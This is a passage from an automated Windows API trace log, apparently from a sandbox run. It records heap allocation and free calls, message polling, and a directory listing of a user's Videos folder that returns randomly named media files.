(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0257.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0257.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0257.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0257.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0257.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0257.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0257.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0257.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0257.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0257.047] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0257.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0257.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0257.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0257.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0257.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0257.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0257.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0257.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0257.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0257.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0257.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0257.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0257.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0257.047] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe724ff16, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe724ff16, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0xa87490 [0257.048] FindNextFileW (in: hFindFile=0xa87490, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe724ff16, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe724ff16, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0257.048] FindNextFileW (in: hFindFile=0xa87490, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ff9bd0, ftCreationTime.dwHighDateTime=0x1d5e6d7, ftLastAccessTime.dwLowDateTime=0xa302c9c0, ftLastAccessTime.dwHighDateTime=0x1d5e770, ftLastWriteTime.dwLowDateTime=0xa302c9c0, ftLastWriteTime.dwHighDateTime=0x1d5e770, nFileSizeHigh=0x0, nFileSizeLow=0x90f2, dwReserved0=0x970000, dwReserved1=0x8cf2d0, cFileName="0FMiSmnvsI1v8s.swf", cAlternateFileName="0FMISM~1.SWF")) returned 1 [0257.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0257.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x26) returned 0x977cf8 [0257.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0257.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0257.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0257.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0257.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0257.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0257.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0257.048] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0257.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0257.048] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0257.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0257.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0257.048] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0257.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0257.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0257.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0257.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0257.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0257.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0257.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0257.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0257.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0257.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0257.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0257.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0257.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0257.049] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0257.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0257.049] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0257.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0257.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0257.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0257.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0257.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0257.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0257.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.049] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0257.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0257.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0257.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0257.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0257.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0257.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0257.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0257.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0257.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0257.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e558d8 [0257.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0257.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0257.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0257.050] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0257.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0257.050] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0257.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0257.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0257.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0257.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.050] FindNextFileW (in: hFindFile=0xa87490, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0257.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0257.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0257.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0257.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0257.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0257.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0257.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0257.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0257.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0257.051] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0257.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0257.051] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0257.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0257.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0257.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0257.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0257.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0257.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0257.051] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0257.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0257.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0257.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0257.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0257.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0257.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0257.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0257.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0257.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0257.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0257.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0257.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0257.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0257.052] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0257.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.052] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0257.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0257.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0257.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0257.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0257.052] FindNextFileW (in: hFindFile=0xa87490, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8b90430, ftCreationTime.dwHighDateTime=0x1d5e95a, ftLastAccessTime.dwLowDateTime=0x40cbbc30, ftLastAccessTime.dwHighDateTime=0x1d5ef9f, ftLastWriteTime.dwLowDateTime=0x40cbbc30, ftLastWriteTime.dwHighDateTime=0x1d5ef9f, nFileSizeHigh=0x0, nFileSizeLow=0x3279, dwReserved0=0x0, dwReserved1=0x0, cFileName="hRmi.mkv", cAlternateFileName="")) returned 1 [0257.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0257.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0257.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0257.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0257.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0257.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0257.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0257.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0257.052] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0257.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.053] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0257.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0257.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0257.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0257.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0257.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0257.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0257.053] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0257.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0257.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0257.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0257.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0257.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0257.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0257.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0257.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0257.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978690 [0257.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0257.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0257.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0257.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.054] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0257.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.054] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0257.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0257.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0257.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0257.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0257.054] FindNextFileW (in: hFindFile=0xa87490, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb92f33c0, ftCreationTime.dwHighDateTime=0x1d5e5d9, ftLastAccessTime.dwLowDateTime=0xc115be00, ftLastAccessTime.dwHighDateTime=0x1d5e364, ftLastWriteTime.dwLowDateTime=0xc115be00, ftLastWriteTime.dwHighDateTime=0x1d5e364, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS5RfKMtjDEBuWff8", cAlternateFileName="MS5RFK~1")) returned 1 [0257.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0257.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0257.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0257.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0257.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0257.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 